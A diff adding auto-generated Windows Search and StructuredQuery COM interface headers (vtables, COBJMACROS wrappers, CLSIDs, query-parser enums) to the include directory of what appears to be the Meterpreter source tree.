+            __RPC__in ISearchManager2 * This,
+            /* [in] */ PROXY_ACCESS sUseProxy,
+            /* [in] */ BOOL fLocalByPassProxy,
+            /* [in] */ DWORD dwPortNumber,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszProxyName,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszByPassList);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCatalog )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszCatalog,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchCatalogManager **ppCatalogManager);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UserAgent )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszUserAgent);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UserAgent )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszUserAgent);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UseProxy )( 
+            __RPC__in ISearchManager2 * This,
+            /* [retval][out] */ __RPC__out PROXY_ACCESS *pUseProxy);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_LocalBypass )( 
+            __RPC__in ISearchManager2 * This,
+            /* [retval][out] */ __RPC__out BOOL *pfLocalBypass);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PortNumber )( 
+            __RPC__in ISearchManager2 * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwPortNumber);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateCatalog )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszCatalog,
+            /* [out] */ __RPC__deref_out_opt ISearchCatalogManager **ppCatalogManager);
+        
+        HRESULT ( STDMETHODCALLTYPE *DeleteCatalog )( 
+            __RPC__in ISearchManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszCatalog);
+        
+        END_INTERFACE
+    } ISearchManager2Vtbl;
+
+    interface ISearchManager2
+    {
+        CONST_VTBL struct ISearchManager2Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchManager2_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchManager2_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchManager2_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchManager2_GetIndexerVersionStr(This,ppszVersionString)	\
+    ( (This)->lpVtbl -> GetIndexerVersionStr(This,ppszVersionString) ) 
+
+#define ISearchManager2_GetIndexerVersion(This,pdwMajor,pdwMinor)	\
+    ( (This)->lpVtbl -> GetIndexerVersion(This,pdwMajor,pdwMinor) ) 
+
+#define ISearchManager2_GetParameter(This,pszName,ppValue)	\
+    ( (This)->lpVtbl -> GetParameter(This,pszName,ppValue) ) 
+
+#define ISearchManager2_SetParameter(This,pszName,pValue)	\
+    ( (This)->lpVtbl -> SetParameter(This,pszName,pValue) ) 
+
+#define ISearchManager2_get_ProxyName(This,ppszProxyName)	\
+    ( (This)->lpVtbl -> get_ProxyName(This,ppszProxyName) ) 
+
+#define ISearchManager2_get_BypassList(This,ppszBypassList)	\
+    ( (This)->lpVtbl -> get_BypassList(This,ppszBypassList) ) 
+
+#define ISearchManager2_SetProxy(This,sUseProxy,fLocalByPassProxy,dwPortNumber,pszProxyName,pszByPassList)	\
+    ( (This)->lpVtbl -> SetProxy(This,sUseProxy,fLocalByPassProxy,dwPortNumber,pszProxyName,pszByPassList) ) 
+
+#define ISearchManager2_GetCatalog(This,pszCatalog,ppCatalogManager)	\
+    ( (This)->lpVtbl -> GetCatalog(This,pszCatalog,ppCatalogManager) ) 
+
+#define ISearchManager2_get_UserAgent(This,ppszUserAgent)	\
+    ( (This)->lpVtbl -> get_UserAgent(This,ppszUserAgent) ) 
+
+#define ISearchManager2_put_UserAgent(This,pszUserAgent)	\
+    ( (This)->lpVtbl -> put_UserAgent(This,pszUserAgent) ) 
+
+#define ISearchManager2_get_UseProxy(This,pUseProxy)	\
+    ( (This)->lpVtbl -> get_UseProxy(This,pUseProxy) ) 
+
+#define ISearchManager2_get_LocalBypass(This,pfLocalBypass)	\
+    ( (This)->lpVtbl -> get_LocalBypass(This,pfLocalBypass) ) 
+
+#define ISearchManager2_get_PortNumber(This,pdwPortNumber)	\
+    ( (This)->lpVtbl -> get_PortNumber(This,pdwPortNumber) ) 
+
+
+#define ISearchManager2_CreateCatalog(This,pszCatalog,ppCatalogManager)	\
+    ( (This)->lpVtbl -> CreateCatalog(This,pszCatalog,ppCatalogManager) ) 
+
+#define ISearchManager2_DeleteCatalog(This,pszCatalog)	\
+    ( (This)->lpVtbl -> DeleteCatalog(This,pszCatalog) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchManager2_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0026 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+EXTERN_C const CLSID CLSID_CSearchLanguageSupport;
+#ifdef __cplusplus
+class DECLSPEC_UUID("6A68CC80-4337-4dbc-BD27-FBFB1053820B")
+CSearchLanguageSupport;
+#endif
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0026_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0026_v0_0_s_ifspec;
+
+#ifndef __ISearchLanguageSupport_INTERFACE_DEFINED__
+#define __ISearchLanguageSupport_INTERFACE_DEFINED__
+
+/* interface ISearchLanguageSupport */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchLanguageSupport;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("24C3CBAA-EBC1-491a-9EF1-9F6D8DEB1B8F")
+    ISearchLanguageSupport : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE SetDiacriticSensitivity( 
+            /* [in] */ BOOL fDiacriticSensitive) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetDiacriticSensitivity( 
+            /* [retval][out] */ __RPC__out BOOL *pfDiacriticSensitive) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE LoadWordBreaker( 
+            /* [in] */ LCID lcid,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][out] */ __RPC__deref_out_opt void **ppWordBreaker,
+            /* [out] */ __RPC__out LCID *pLcidUsed) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE LoadStemmer( 
+            /* [in] */ LCID lcid,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][out] */ __RPC__deref_out_opt void **ppStemmer,
+            /* [out] */ __RPC__out LCID *pLcidUsed) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE IsPrefixNormalized( 
+            /* [size_is][in] */ __RPC__in_ecount_full(cwcQueryToken) LPCWSTR pwcsQueryToken,
+            /* [in] */ ULONG cwcQueryToken,
+            /* [size_is][in] */ __RPC__in_ecount_full(cwcDocumentToken) LPCWSTR pwcsDocumentToken,
+            /* [in] */ ULONG cwcDocumentToken,
+            /* [out] */ __RPC__out ULONG *pulPrefixLength) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchLanguageSupportVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchLanguageSupport * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchLanguageSupport * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchLanguageSupport * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetDiacriticSensitivity )( 
+            __RPC__in ISearchLanguageSupport * This,
+            /* [in] */ BOOL fDiacriticSensitive);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDiacriticSensitivity )( 
+            __RPC__in ISearchLanguageSupport * This,
+            /* [retval][out] */ __RPC__out BOOL *pfDiacriticSensitive);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadWordBreaker )( 
+            __RPC__in ISearchLanguageSupport * This,
+            /* [in] */ LCID lcid,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][out] */ __RPC__deref_out_opt void **ppWordBreaker,
+            /* [out] */ __RPC__out LCID *pLcidUsed);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadStemmer )( 
+            __RPC__in ISearchLanguageSupport * This,
+            /* [in] */ LCID lcid,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][out] */ __RPC__deref_out_opt void **ppStemmer,
+            /* [out] */ __RPC__out LCID *pLcidUsed);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsPrefixNormalized )( 
+            __RPC__in ISearchLanguageSupport * This,
+            /* [size_is][in] */ __RPC__in_ecount_full(cwcQueryToken) LPCWSTR pwcsQueryToken,
+            /* [in] */ ULONG cwcQueryToken,
+            /* [size_is][in] */ __RPC__in_ecount_full(cwcDocumentToken) LPCWSTR pwcsDocumentToken,
+            /* [in] */ ULONG cwcDocumentToken,
+            /* [out] */ __RPC__out ULONG *pulPrefixLength);
+        
+        END_INTERFACE
+    } ISearchLanguageSupportVtbl;
+
+    interface ISearchLanguageSupport
+    {
+        CONST_VTBL struct ISearchLanguageSupportVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchLanguageSupport_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchLanguageSupport_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchLanguageSupport_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchLanguageSupport_SetDiacriticSensitivity(This,fDiacriticSensitive)	\
+    ( (This)->lpVtbl -> SetDiacriticSensitivity(This,fDiacriticSensitive) ) 
+
+#define ISearchLanguageSupport_GetDiacriticSensitivity(This,pfDiacriticSensitive)	\
+    ( (This)->lpVtbl -> GetDiacriticSensitivity(This,pfDiacriticSensitive) ) 
+
+#define ISearchLanguageSupport_LoadWordBreaker(This,lcid,riid,ppWordBreaker,pLcidUsed)	\
+    ( (This)->lpVtbl -> LoadWordBreaker(This,lcid,riid,ppWordBreaker,pLcidUsed) ) 
+
+#define ISearchLanguageSupport_LoadStemmer(This,lcid,riid,ppStemmer,pLcidUsed)	\
+    ( (This)->lpVtbl -> LoadStemmer(This,lcid,riid,ppStemmer,pLcidUsed) ) 
+
+#define ISearchLanguageSupport_IsPrefixNormalized(This,pwcsQueryToken,cwcQueryToken,pwcsDocumentToken,cwcDocumentToken,pulPrefixLength)	\
+    ( (This)->lpVtbl -> IsPrefixNormalized(This,pwcsQueryToken,cwcQueryToken,pwcsDocumentToken,cwcDocumentToken,pulPrefixLength) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchLanguageSupport_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0027 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0027_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0027_v0_0_s_ifspec;
+
+
+#ifndef __SearchAPILib_LIBRARY_DEFINED__
+#define __SearchAPILib_LIBRARY_DEFINED__
+
+/* library SearchAPILib */
+/* [version][uuid] */ 
+
+
+
+
+
+
+
+
+
+EXTERN_C const IID LIBID_SearchAPILib;
+
+EXTERN_C const CLSID CLSID_CSearchManager;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("7D096C5F-AC08-4f1f-BEB7-5C22C517CE39")
+CSearchManager;
+#endif
+
+EXTERN_C const CLSID CLSID_CSearchRoot;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("30766BD2-EA1C-4F28-BF27-0B44E2F68DB7")
+CSearchRoot;
+#endif
+
+EXTERN_C const CLSID CLSID_CSearchScopeRule;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("E63DE750-3BD7-4BE5-9C84-6B4281988C44")
+CSearchScopeRule;
+#endif
+
+EXTERN_C const CLSID CLSID_FilterRegistration;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("9E175B8D-F52A-11D8-B9A5-505054503030")
+FilterRegistration;
+#endif
+#endif /* __SearchAPILib_LIBRARY_DEFINED__ */
+
+/* interface __MIDL_itf_searchapi_0000_0028 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0028_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0028_v0_0_s_ifspec;
+
+/* Additional Prototypes for ALL interfaces */
+
+unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
+void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 
+
+unsigned long             __RPC_USER  LPSAFEARRAY_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out LPSAFEARRAY * ); 
+void                      __RPC_USER  LPSAFEARRAY_UserFree(     __RPC__in unsigned long *, __RPC__in LPSAFEARRAY * ); 
+
+unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
+void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 
+
+unsigned long             __RPC_USER  LPSAFEARRAY_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out LPSAFEARRAY * ); 
+void                      __RPC_USER  LPSAFEARRAY_UserFree64(     __RPC__in unsigned long *, __RPC__in LPSAFEARRAY * ); 
+
+/* [local] */ HRESULT STDMETHODCALLTYPE ISearchCrawlScopeManager2_GetVersion_Proxy( 
+    ISearchCrawlScopeManager2 * This,
+    /* [out] */ long **plVersion,
+    /* [out] */ HANDLE *phFileMapping);
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ISearchCrawlScopeManager2_GetVersion_Stub( 
+    __RPC__in ISearchCrawlScopeManager2 * This,
+    /* [out] */ __RPC__out long *plVersion);
+
+
+
+/* end of Additional Prototypes */
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif
+
+

--- a/c/meterpreter/source/extra_includes/StructuredQuery.h
+++ b/c/meterpreter/source/extra_includes/StructuredQuery.h
@@ -1,0 +1,2579 @@
+
+
+/* this ALWAYS GENERATED file contains the definitions for the interfaces */
+
+
+ /* File created by MIDL compiler version 8.01.0622 */
+/* @@MIDL_FILE_HEADING(  ) */
+
+
+
+/* verify that the <rpcndr.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCNDR_H_VERSION__
+#define __REQUIRED_RPCNDR_H_VERSION__ 500
+#endif
+
+/* verify that the <rpcsal.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCSAL_H_VERSION__
+#define __REQUIRED_RPCSAL_H_VERSION__ 100
+#endif
+
+#include "rpc.h"
+#include "rpcndr.h"
+
+#ifndef __RPCNDR_H_VERSION__
+#error this stub requires an updated version of <rpcndr.h>
+#endif /* __RPCNDR_H_VERSION__ */
+
+#ifndef COM_NO_WINDOWS_H
+#include "windows.h"
+#include "ole2.h"
+#endif /*COM_NO_WINDOWS_H*/
+
+#ifndef __structuredquery_h__
+#define __structuredquery_h__
+
+#if defined(_MSC_VER) && (_MSC_VER >= 1020)
+#pragma once
+#endif
+
+/* Forward Declarations */ 
+
+#ifndef __IQueryParser_FWD_DEFINED__
+#define __IQueryParser_FWD_DEFINED__
+typedef interface IQueryParser IQueryParser;
+
+#endif 	/* __IQueryParser_FWD_DEFINED__ */
+
+
+#ifndef __IConditionFactory_FWD_DEFINED__
+#define __IConditionFactory_FWD_DEFINED__
+typedef interface IConditionFactory IConditionFactory;
+
+#endif 	/* __IConditionFactory_FWD_DEFINED__ */
+
+
+#ifndef __IQuerySolution_FWD_DEFINED__
+#define __IQuerySolution_FWD_DEFINED__
+typedef interface IQuerySolution IQuerySolution;
+
+#endif 	/* __IQuerySolution_FWD_DEFINED__ */
+
+
+#ifndef __IConditionFactory2_FWD_DEFINED__
+#define __IConditionFactory2_FWD_DEFINED__
+typedef interface IConditionFactory2 IConditionFactory2;
+
+#endif 	/* __IConditionFactory2_FWD_DEFINED__ */
+
+
+#ifndef __IConditionGenerator_FWD_DEFINED__
+#define __IConditionGenerator_FWD_DEFINED__
+typedef interface IConditionGenerator IConditionGenerator;
+
+#endif 	/* __IConditionGenerator_FWD_DEFINED__ */
+
+
+#ifndef __IInterval_FWD_DEFINED__
+#define __IInterval_FWD_DEFINED__
+typedef interface IInterval IInterval;
+
+#endif 	/* __IInterval_FWD_DEFINED__ */
+
+
+#ifndef __IMetaData_FWD_DEFINED__
+#define __IMetaData_FWD_DEFINED__
+typedef interface IMetaData IMetaData;
+
+#endif 	/* __IMetaData_FWD_DEFINED__ */
+
+
+#ifndef __IEntity_FWD_DEFINED__
+#define __IEntity_FWD_DEFINED__
+typedef interface IEntity IEntity;
+
+#endif 	/* __IEntity_FWD_DEFINED__ */
+
+
+#ifndef __IRelationship_FWD_DEFINED__
+#define __IRelationship_FWD_DEFINED__
+typedef interface IRelationship IRelationship;
+
+#endif 	/* __IRelationship_FWD_DEFINED__ */
+
+
+#ifndef __INamedEntity_FWD_DEFINED__
+#define __INamedEntity_FWD_DEFINED__
+typedef interface INamedEntity INamedEntity;
+
+#endif 	/* __INamedEntity_FWD_DEFINED__ */
+
+
+#ifndef __ISchemaProvider_FWD_DEFINED__
+#define __ISchemaProvider_FWD_DEFINED__
+typedef interface ISchemaProvider ISchemaProvider;
+
+#endif 	/* __ISchemaProvider_FWD_DEFINED__ */
+
+
+#ifndef __ITokenCollection_FWD_DEFINED__
+#define __ITokenCollection_FWD_DEFINED__
+typedef interface ITokenCollection ITokenCollection;
+
+#endif 	/* __ITokenCollection_FWD_DEFINED__ */
+
+
+#ifndef __INamedEntityCollector_FWD_DEFINED__
+#define __INamedEntityCollector_FWD_DEFINED__
+typedef interface INamedEntityCollector INamedEntityCollector;
+
+#endif 	/* __INamedEntityCollector_FWD_DEFINED__ */
+
+
+#ifndef __ISchemaLocalizerSupport_FWD_DEFINED__
+#define __ISchemaLocalizerSupport_FWD_DEFINED__
+typedef interface ISchemaLocalizerSupport ISchemaLocalizerSupport;
+
+#endif 	/* __ISchemaLocalizerSupport_FWD_DEFINED__ */
+
+
+#ifndef __IQueryParserManager_FWD_DEFINED__
+#define __IQueryParserManager_FWD_DEFINED__
+typedef interface IQueryParserManager IQueryParserManager;
+
+#endif 	/* __IQueryParserManager_FWD_DEFINED__ */
+
+
+#ifndef __QueryParser_FWD_DEFINED__
+#define __QueryParser_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class QueryParser QueryParser;
+#else
+typedef struct QueryParser QueryParser;
+#endif /* __cplusplus */
+
+#endif 	/* __QueryParser_FWD_DEFINED__ */
+
+
+#ifndef __NegationCondition_FWD_DEFINED__
+#define __NegationCondition_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class NegationCondition NegationCondition;
+#else
+typedef struct NegationCondition NegationCondition;
+#endif /* __cplusplus */
+
+#endif 	/* __NegationCondition_FWD_DEFINED__ */
+
+
+#ifndef __CompoundCondition_FWD_DEFINED__
+#define __CompoundCondition_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class CompoundCondition CompoundCondition;
+#else
+typedef struct CompoundCondition CompoundCondition;
+#endif /* __cplusplus */
+
+#endif 	/* __CompoundCondition_FWD_DEFINED__ */
+
+
+#ifndef __LeafCondition_FWD_DEFINED__
+#define __LeafCondition_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class LeafCondition LeafCondition;
+#else
+typedef struct LeafCondition LeafCondition;
+#endif /* __cplusplus */
+
+#endif 	/* __LeafCondition_FWD_DEFINED__ */
+
+
+#ifndef __ConditionFactory_FWD_DEFINED__
+#define __ConditionFactory_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class ConditionFactory ConditionFactory;
+#else
+typedef struct ConditionFactory ConditionFactory;
+#endif /* __cplusplus */
+
+#endif 	/* __ConditionFactory_FWD_DEFINED__ */
+
+
+#ifndef __Interval_FWD_DEFINED__
+#define __Interval_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class Interval Interval;
+#else
+typedef struct Interval Interval;
+#endif /* __cplusplus */
+
+#endif 	/* __Interval_FWD_DEFINED__ */
+
+
+#ifndef __QueryParserManager_FWD_DEFINED__
+#define __QueryParserManager_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class QueryParserManager QueryParserManager;
+#else
+typedef struct QueryParserManager QueryParserManager;
+#endif /* __cplusplus */
+
+#endif 	/* __QueryParserManager_FWD_DEFINED__ */
+
+
+/* header files for imported files */
+#include "StructuredQueryCondition.h"
+#include "objectarray.h"
+
+#ifdef __cplusplus
+extern "C"{
+#endif 
+
+
+/* interface __MIDL_itf_structuredquery_0000_0000 */
+/* [local] */ 
+
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+#if 0
+typedef PROPERTYKEY *REFPROPERTYKEY;
+
+#endif // 0
+#include <propkeydef.h>
+
+
+
+
+
+
+
+
+
+typedef /* [v1_enum] */ 
+enum tagSTRUCTURED_QUERY_SYNTAX
+    {
+        SQS_NO_SYNTAX	= 0,
+        SQS_ADVANCED_QUERY_SYNTAX	= ( SQS_NO_SYNTAX + 1 ) ,
+        SQS_NATURAL_QUERY_SYNTAX	= ( SQS_ADVANCED_QUERY_SYNTAX + 1 ) 
+    } 	STRUCTURED_QUERY_SYNTAX;
+
+typedef /* [v1_enum] */ 
+enum tagSTRUCTURED_QUERY_SINGLE_OPTION
+    {
+        SQSO_SCHEMA	= 0,
+        SQSO_LOCALE_WORD_BREAKING	= ( SQSO_SCHEMA + 1 ) ,
+        SQSO_WORD_BREAKER	= ( SQSO_LOCALE_WORD_BREAKING + 1 ) ,
+        SQSO_NATURAL_SYNTAX	= ( SQSO_WORD_BREAKER + 1 ) ,
+        SQSO_AUTOMATIC_WILDCARD	= ( SQSO_NATURAL_SYNTAX + 1 ) ,
+        SQSO_TRACE_LEVEL	= ( SQSO_AUTOMATIC_WILDCARD + 1 ) ,
+        SQSO_LANGUAGE_KEYWORDS	= ( SQSO_TRACE_LEVEL + 1 ) ,
+        SQSO_SYNTAX	= ( SQSO_LANGUAGE_KEYWORDS + 1 ) ,
+        SQSO_TIME_ZONE	= ( SQSO_SYNTAX + 1 ) ,
+        SQSO_IMPLICIT_CONNECTOR	= ( SQSO_TIME_ZONE + 1 ) ,
+        SQSO_CONNECTOR_CASE	= ( SQSO_IMPLICIT_CONNECTOR + 1 ) 
+    } 	STRUCTURED_QUERY_SINGLE_OPTION;
+
+typedef /* [v1_enum] */ 
+enum tagSTRUCTURED_QUERY_MULTIOPTION
+    {
+        SQMO_VIRTUAL_PROPERTY	= 0,
+        SQMO_DEFAULT_PROPERTY	= ( SQMO_VIRTUAL_PROPERTY + 1 ) ,
+        SQMO_GENERATOR_FOR_TYPE	= ( SQMO_DEFAULT_PROPERTY + 1 ) ,
+        SQMO_MAP_PROPERTY	= ( SQMO_GENERATOR_FOR_TYPE + 1 ) 
+    } 	STRUCTURED_QUERY_MULTIOPTION;
+
+typedef /* [v1_enum] */ 
+enum tagSTRUCTURED_QUERY_PARSE_ERROR
+    {
+        SQPE_NONE	= 0,
+        SQPE_EXTRA_OPENING_PARENTHESIS	= ( SQPE_NONE + 1 ) ,
+        SQPE_EXTRA_CLOSING_PARENTHESIS	= ( SQPE_EXTRA_OPENING_PARENTHESIS + 1 ) ,
+        SQPE_IGNORED_MODIFIER	= ( SQPE_EXTRA_CLOSING_PARENTHESIS + 1 ) ,
+        SQPE_IGNORED_CONNECTOR	= ( SQPE_IGNORED_MODIFIER + 1 ) ,
+        SQPE_IGNORED_KEYWORD	= ( SQPE_IGNORED_CONNECTOR + 1 ) ,
+        SQPE_UNHANDLED	= ( SQPE_IGNORED_KEYWORD + 1 ) 
+    } 	STRUCTURED_QUERY_PARSE_ERROR;
+
+typedef /* [v1_enum] */ 
+enum STRUCTURED_QUERY_RESOLVE_OPTION
+    {
+        SQRO_DEFAULT	= 0,
+        SQRO_DONT_RESOLVE_DATETIME	= 0x1,
+        SQRO_ALWAYS_ONE_INTERVAL	= 0x2,
+        SQRO_DONT_SIMPLIFY_CONDITION_TREES	= 0x4,
+        SQRO_DONT_MAP_RELATIONS	= 0x8,
+        SQRO_DONT_RESOLVE_RANGES	= 0x10,
+        SQRO_DONT_REMOVE_UNRESTRICTED_KEYWORDS	= 0x20,
+        SQRO_DONT_SPLIT_WORDS	= 0x40,
+        SQRO_IGNORE_PHRASE_ORDER	= 0x80,
+        SQRO_ADD_VALUE_TYPE_FOR_PLAIN_VALUES	= 0x100,
+        SQRO_ADD_ROBUST_ITEM_NAME	= 0x200
+    } 	STRUCTURED_QUERY_RESOLVE_OPTION;
+
+DEFINE_ENUM_FLAG_OPERATORS(STRUCTURED_QUERY_RESOLVE_OPTION);
+typedef /* [v1_enum] */ 
+enum CASE_REQUIREMENT
+    {
+        CASE_REQUIREMENT_ANY	= 0,
+        CASE_REQUIREMENT_UPPER_IF_AQS	= ( CASE_REQUIREMENT_ANY + 1 ) 
+    } 	CASE_REQUIREMENT;
+
+typedef /* [v1_enum] */ 
+enum tagINTERVAL_LIMIT_KIND
+    {
+        ILK_EXPLICIT_INCLUDED	= 0,
+        ILK_EXPLICIT_EXCLUDED	= ( ILK_EXPLICIT_INCLUDED + 1 ) ,
+        ILK_NEGATIVE_INFINITY	= ( ILK_EXPLICIT_EXCLUDED + 1 ) ,
+        ILK_POSITIVE_INFINITY	= ( ILK_NEGATIVE_INFINITY + 1 ) 
+    } 	INTERVAL_LIMIT_KIND;
+
+typedef /* [v1_enum] */ 
+enum tagQUERY_PARSER_MANAGER_OPTION
+    {
+        QPMO_SCHEMA_BINARY_NAME	= 0,
+        QPMO_PRELOCALIZED_SCHEMA_BINARY_PATH	= ( QPMO_SCHEMA_BINARY_NAME + 1 ) ,
+        QPMO_UNLOCALIZED_SCHEMA_BINARY_PATH	= ( QPMO_PRELOCALIZED_SCHEMA_BINARY_PATH + 1 ) ,
+        QPMO_LOCALIZED_SCHEMA_BINARY_PATH	= ( QPMO_UNLOCALIZED_SCHEMA_BINARY_PATH + 1 ) ,
+        QPMO_APPEND_LCID_TO_LOCALIZED_PATH	= ( QPMO_LOCALIZED_SCHEMA_BINARY_PATH + 1 ) ,
+        QPMO_LOCALIZER_SUPPORT	= ( QPMO_APPEND_LCID_TO_LOCALIZED_PATH + 1 ) 
+    } 	QUERY_PARSER_MANAGER_OPTION;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0000_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0000_v0_0_s_ifspec;
+
+#ifndef __IQueryParser_INTERFACE_DEFINED__
+#define __IQueryParser_INTERFACE_DEFINED__
+
+/* interface IQueryParser */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IQueryParser;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("2EBDEE67-3505-43f8-9946-EA44ABC8E5B0")
+    IQueryParser : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Parse( 
